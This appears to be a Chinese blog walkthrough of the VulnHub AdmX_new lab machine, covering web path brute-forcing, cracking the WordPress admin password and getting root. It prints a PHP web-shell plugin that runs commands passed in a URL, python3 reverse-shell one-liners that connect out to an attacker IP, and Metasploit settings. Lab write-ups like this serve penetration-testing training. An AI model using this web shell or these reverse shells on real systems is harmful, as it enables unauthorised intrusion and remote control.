红队打靶之VulnHub_AdmX_new

Created At :
Views 👀 :
  1. 红队打靶之VulnHub_AdmX_new
  2. 主机发现
  3. WEB路径爆破
  4. BurpSuite内容替换
  5. 密码爆破
    1. 上传插件
  6. 方法二 通过msf
  7. 提权

红队打靶之VulnHub_AdmX_new

靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z

打靶目标: 取得 2 个 flag + root 权限

反弹Sheel代码:

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.2.7”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

升级Full TTY:

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 38 columns 116

reset

涉及攻击方法:

主机发现

WEB路径爆破

diresearch -u http://192.168.110.144

diresearch -u http://192.168.110.144/wordpress

BurpSuite内容替换

通过 burpsuite抓包我们可以发现当访问 /wordpress的时候该网页会自动的向 192.168.159.145请求三个 js文件,通过 burpsuite的回包分析,我们有是可以很明显的这个ip是直接写入到响应代码中的。

们可以猜测这个 ip是靶机设计的时候的原本 ip。我们通过 burpsuiteMatch and replace rules功能自动的帮我们更改 respnse包中的ip内容为当前靶机的 ip:1.0.0.4,可以发现网页成功的渲染。但是当我们点击网页的每个连接发现都是没有任何反应的,而且再去复看网页源码也是一无所获。

之后网站输入 http://192.168.110.144/wordpress/wp-admin,可以看到是登录框

密码爆破

首先wordpress默认账号为admin,利用bp爆破

adam14

MSF漏洞利用

上传插件

写好之后压缩

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
/*
Plugin Name: payload
Plugin URI: https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version: 20160911
Author: WordPress.org
Author URI: https://developer.wordpress.org/
License: GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
Text Domain: wporg
Domain Path: /languages
*/
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
    ?>

vim payload.php

zip payload.zip payload.php

多试几下python环境,发现存在python3

1
http://192.168.110.144/wordpress/wp-conetn/plugins/exp.php?cmd=which python3

ok 用一下 

1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.141",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

成功拿到shell

方法二 通过msf

1
2
3
search wordpress admin

use 2

show options配一下参数

1
2
3
4
5
set PASSWORD adam14
set RHOSTS 192.168.110.144
set USERNAME admin
set TARGETURI /wordpress
run

提权

首先查看 cat /etc/passwd

查看wordpress配置文件 有数据库的账号和密码

企业应用管理员 习惯用密码复用

尝试 登录数据库 失败

尝试登陆 wpadmin 密码为 adam14

内容简介:

本周的靶机中部署了Wordpress应用。我在课程中总结了其后台漏洞的常见利用方法,并演示了如何将非交互Shell升级为Full TTY终端。最终我们利用系统权限配置缺陷和MySQL自身的特性完成了最终的提权,这与我们以往的提权方式非常不同,希望对大家日后的实战渗透思路有所帮助!

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 jaytp@qq.com

💰

©2016-2023 answer77

Built with Hexo and 3-hexo theme

×

Help us with donation